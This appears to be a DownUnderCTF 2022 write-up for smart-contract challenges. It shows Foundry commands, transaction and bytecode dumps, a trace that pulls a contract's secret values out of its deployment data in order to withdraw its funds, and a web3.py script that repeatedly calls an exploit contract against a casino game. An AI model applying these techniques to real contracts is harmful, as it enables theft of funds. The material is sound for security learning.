Table of Contents
Foundry Setting Example
export FOUNDRY_ETH_RPC_URL=https://blockchain-secretandephemeral-8ea1a06ad5bc87ae-eth.2022.ductf.dev/
export PRIVATE_KEY=0x352b2b84acd9b65588c1c04b8cd0130b883b800ec1219af08e892757578acd19
export INSTANCE_ADDRESS=0x6E4198C61C75D1B4D1cbcd00707aAC7d76867cF8
cast send --legacy --private-key $PRIVATE_KEY $INSTANCE_ADDRESS "solveChallenge()"
Flag: DUCTF{muM_1_did_a_blonkchain!}
$ cast block 4
baseFeePerGas
difficulty 2
extraData 0xd883010a19846765746888676f312e31382e36856c696e757800000000000000b4f6ccd7a57c8c26496d51884d640d12eaa1b9089aa6ccb2f88e41fa38369ecb2caab38c54300e3630bd9c9c453b1e61bed287940ce19021e98b658749ce398201
gasLimit 4718380
gasUsed 412467
hash 0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
logsBloom 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
miner 0x0000000000000000000000000000000000000000
mixHash 0x0000000000000000000000000000000000000000000000000000000000000000
nonce 0x0000000000000000
number 4
parentHash 0x12813305017ea5a2ff9478d6ff33e6f0ded7634e3b0058cd8097c311de053803
receiptsRoot 0x2b6c5345a4e411cdc4903d21da6b4eacb15be1c4c5866316349ba632e9b75af2
sealFields []
sha3Uncles 0x1dcc4de8dec75d7aab85b567b6ccd41ad312451b948a7413f0a142fd40d49347
size 2758
stateRoot 0xc93ef167d6a398a32d51910c8cc97645c63f0949e3767a2c853a81dc63fc71a1
timestamp 1664346293
totalDifficulty 9
transactions: [
0x33252839d47608a1259bfe12910fdb699dd1cb2c695804ce483b870688718582
0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
]
$ cast tx 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
blockHash 0x1f055892ea28c97622af29d88cc2e08d330d51fa71ba363d8a9e4d300b31f1fa
blockNumber 4
from 0x7BCF8A237e5d8900445C148FC2b119670807575b
gas 391467
gasPrice 1000000000
hash 0xd3383dd590ea361847180c3616faed3a091c3e8f3296771e0c2844b2746d408f
input 0x6301e1338060015560c060405260046080908152636570696360e01b60a05260029061002b908261013c565b5034801561003857600080fd5b506040516106fd3803806106fd833981016040819052610057916101fb565b6003610063838261013c565b506003813360405160200161007a939291906102ca565b60405160208183030381529060405280519060200120600581905550505061035a565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806100c757607f821691505b6020821081036100e757634e487b7160e01b600052602260045260246000fd5b50919050565b601f82111561013757600081815260208120601f850160051c810160208610156101145750805b601f850160051c820191505b8181101561013357828155600101610120565b5050505b505050565b81516001600160401b038111156101555761015561009d565b6101698161016384546100b3565b846100ed565b602080601f83116001811461019e57600084156101865750858301515b600019600386901b1c1916600185901b178555610133565b600085815260208120601f198616915b828110156101cd578886015182559484019460019091019084016101ae565b50858210156101eb5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000806040838503121561020e57600080fd5b82516001600160401b038082111561022557600080fd5b818501915085601f83011261023957600080fd5b81518181111561024b5761024b61009d565b604051601f8201601f19908116603f011681019083821181831017156102735761027361009d565b8160405282815260209350888484870101111561028f57600080fd5b600091505b828210156102b15784820184015181830185015290830190610294565b6000928101840192909252509401519395939450505050565b60008085546102d8816100b3565b600182811680156102f0576001811461030557610334565b60ff1984168752821515830287019450610334565b8960005260208060002060005b8581101561032b5781548a820152908401908201610312565b50505082870194505b50505094815260609390931b6001600160601b0319166020840152505060340192915050565b610394806103696000396000f3fe60806040526004361061004a5760003560e01c80631ac749ff1461004f57806323cfb56f146100775780637c46a9b014610081578063eb087bfb146100ae578063ecd424df146100c4575b600080fd5b34801561005b57600080fd5b5061006560015481565b60405190815260200160405180910390f35b61007f6100e4565b005b34801561008d57600080fd5b5061006561009c3660046101eb565b60046020526000908152604090205481565b3480156100ba57600080fd5b5061006560055481565b3480156100d057600080fd5b5061007f6100df366004610223565b61011e565b67016345785d8a000034116100f857600080fd5b33600090815260046020526040812080543492906101179084906102ee565b9091555050565b600083838360405160200161013593929190610315565b60405160208183030381529060405280519060200120905060055481146101985760405162461bcd60e51b81526020600482015260136024820152720a6dedacae8d0d2dccee640eee4dedcce40745606b1b604482015260640160405180910390fd5b6040514790339082156108fc029083906000818181858888f193505050501580156101c7573d6000803e3d6000fd5b505050505050565b80356001600160a01b03811681146101e657600080fd5b919050565b6000602082840312156101fd57600080fd5b610206826101cf565b9392505050565b634e487b7160e01b600052604160045260246000fd5b60008060006060848603121561023857600080fd5b833567ffffffffffffffff8082111561025057600080fd5b818601915086601f83011261026457600080fd5b8135818111156102765761027661020d565b604051601f8201601f19908116603f0116810190838211818310171561029e5761029e61020d565b816040528281528960208487010111156102b757600080fd5b826020860160208301376000602084830101528097505050505050602084013591506102e5604085016101cf565b90509250925092565b8082018082111561030f57634e487b7160e01b600052601160045260246000fd5b92915050565b6000845160005b81811015610336576020818801810151858301520161031c565b50919091019283525060601b6bffffffffffffffffffffffff1916602082015260340191905056fea2646970667358221220c558120b35ab560caa833f878d167e3c94af9005d6dea322262181580b0f895864736f6c634300081100330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000000000000000000000000022736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000000
nonce 1
r 0xcf50c8e0ed100baae3b31d69e45e7498caec66478e5ed9d884c3cedec6a14f82
s 0x73ebe87f3541c26669adf9ef18e665f47f1a30796f8f4b7162795099807f7e5a
to
transactionIndex 1
v 62710
value 0
input.txt
:
6301e1338060015560c060405260046080908152636570696360e01b60a05260029061002b908261013c565b5034801561003857600080fd5b506040516106fd3803806106fd833981016040819052610057916101fb565b6003610063838261013c565b506003813360405160200161007a939291906102ca565b60405160208183030381529060405280519060200120600581905550505061035a565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806100c757607f821691505b6020821081036100e757634e487b7160e01b600052602260045260246000fd5b50919050565b601f82111561013757600081815260208120601f850160051c810160208610156101145750805b601f850160051c820191505b8181101561013357828155600101610120565b5050505b505050565b81516001600160401b038111156101555761015561009d565b6101698161016384546100b3565b846100ed565b602080601f83116001811461019e57600084156101865750858301515b600019600386901b1c1916600185901b178555610133565b600085815260208120601f198616915b828110156101cd578886015182559484019460019091019084016101ae565b50858210156101eb5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b6000806040838503121561020e57600080fd5b82516001600160401b038082111561022557600080fd5b818501915085601f83011261023957600080fd5b81518181111561024b5761024b61009d565b604051601f8201601f19908116603f011681019083821181831017156102735761027361009d565b8160405282815260209350888484870101111561028f57600080fd5b600091505b828210156102b15784820184015181830185015290830190610294565b6000928101840192909252509401519395939450505050565b60008085546102d8816100b3565b600182811680156102f0576001811461030557610334565b60ff1984168752821515830287019450610334565b8960005260208060002060005b8581101561032b5781548a820152908401908201610312565b50505082870194505b50505094815260609390931b6001600160601b0319166020840152505060340192915050565b610394806103696000396000f3fe60806040526004361061004a5760003560e01c80631ac749ff1461004f57806323cfb56f146100775780637c46a9b014610081578063eb087bfb146100ae578063ecd424df146100c4575b600080fd5b34801561005b57600080fd5b5061006560015481565b60405190815260200160405180910390f35b61007f6100e4565b005b34801561008d57600080fd5b5061006561009c3660046101eb565b60046020526000908152604090205481565b3480156100ba57600080fd5b5061006560055481565b3480156100d057600080fd5b5061007f6100df366004610223565b61011e565b67016345785d8a000034116100f857600080fd5b33600090815260046020526040812080543492906101179084906102ee565b9091555050565b600083838360405160200161013593929190610315565b60405160208183030381529060405280519060200120905060055481146101985760405162461bcd60e51b81526020600482015260136024820152720a6dedacae8d0d2dccee640eee4dedcce40745606b1b604482015260640160405180910390fd5b6040514790339082156108fc029083906000818181858888f193505050501580156101c7573d6000803e3d6000fd5b505050505050565b80356001600160a01b03811681146101e657600080fd5b919050565b6000602082840312156101fd57600080fd5b610206826101cf565b9392505050565b634e487b7160e01b600052604160045260246000fd5b60008060006060848603121561023857600080fd5b833567ffffffffffffffff8082111561025057600080fd5b818601915086601f83011261026457600080fd5b8135818111156102765761027661020d565b604051601f8201601f19908116603f0116810190838211818310171561029e5761029e61020d565b816040528281528960208487010111156102b757600080fd5b826020860160208301376000602084830101528097505050505050602084013591506102e5604085016101cf565b90509250925092565b8082018082111561030f57634e487b7160e01b600052601160045260246000fd5b92915050565b6000845160005b81811015610336576020818801810151858301520161031c565b50919091019283525060601b6bffffffffffffffffffffffff1916602082015260340191905056fea2646970667358221220c558120b35ab560caa833f878d167e3c94af9005d6dea322262181580b0f895864736f6c634300081100330000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000000000000000000000000022736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000000
$ erever -f src/DownUnderCTF2022/SecretAndEphemeral/input.txt --trace | grep KECCAK256 -A 2
0x1a7: KECCAK256(offset:0x00, size:0x20)
input 0000000000000000000000000000000000000000000000000000000000000003
stack [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x00, 0x01, 0x20, 0x20, 0x22, 0x03, 0x0160, 0x63, 0x03, 0x0dec0ded, 0x0160]
--
0x30f: KECCAK256(offset:0x00, size:0x20)
input 0000000000000000000000000000000000000000000000000000000000000003
stack [0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85b, 0x20, 0x01, 0x01, 0x22, 0x45, 0x00, 0x00, 0x0200, 0x00, 0x0dec0ded, 0x03, 0x7a, 0x0dec0ded, 0x0160]
--
0x090: KECCAK256(offset:0x0200, size:0x56)
input 736f20616e79776179732069206a757374207374617274656420626c617374696e67000000000000000000000000000000000000000000000000000000000dec0ded0000000000000000000000000000000000000000
stack [0x6d824e64b8b76112000b269b31bda718c9c7d489babeaf84a2dcd3c91a329309, 0x0dec0ded, 0x0160]
not_yours
: 0x736f20616e79776179732069206a757374207374617274656420626c617374696e67
(so anyways i just started blasting
)
secret_number
: 0x000000000000000000000000000000000000000000000000000000000dec0ded
owner
: 0x7BCF8A237e5d8900445C148FC2b119670807575b
cast send --legacy --private-key $PRIVATE_KEY $INSTANCE_ADDRESS "retrieveTheFunds(string,uint256,address)" "so anyways i just started blasting" 233573869 0x7BCF8A237e5d8900445C148FC2b119670807575b
Flag: DUCTF{u_r_a_web3_t1me_7raveler_:)}
from web3 import Web3
import json
w3 = Web3(Web3.HTTPProvider('https://blockchain-cryptocasino-468129ee23c33222-eth.2022.ductf.dev:443/'))
private_key = "0x489ada60affa1f5aa99353561a85020570dd5163e5decaf7fec93072376289f3"
player_address = "0x801da62Bf5bB02Da223147E13010025Bc841800A"
exploit_abi = json.load(open("out/Exploit.sol/Exploit.json"))["abi"]
exploit = w3.eth.contract(address="0xFAa598083775387feC2D170EB85055C420B97b20", abi=exploit_abi)
chain_id = 31337
gas_limit = 2000000
def send(function):
txn = function.build_transaction({'chainId': chain_id, 'gas': gas_limit, 'gasPrice': w3.toWei('1', 'gwei'), 'nonce': w3.eth.getTransactionCount(player_address), })
signed_txn = w3.eth.account.sign_transaction(txn, private_key=private_key)
w3.eth.send_raw_transaction(signed_txn.rawTransaction)
tx_hash = w3.toHex(w3.keccak(signed_txn.rawTransaction))
tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
return tx_receipt
for i in range(100):
tx_receipt = send(exploit.functions.exploit())
print(tx_receipt["status"])
Flag: DUCTF{sh0uldv3_us3d_a_vrf??}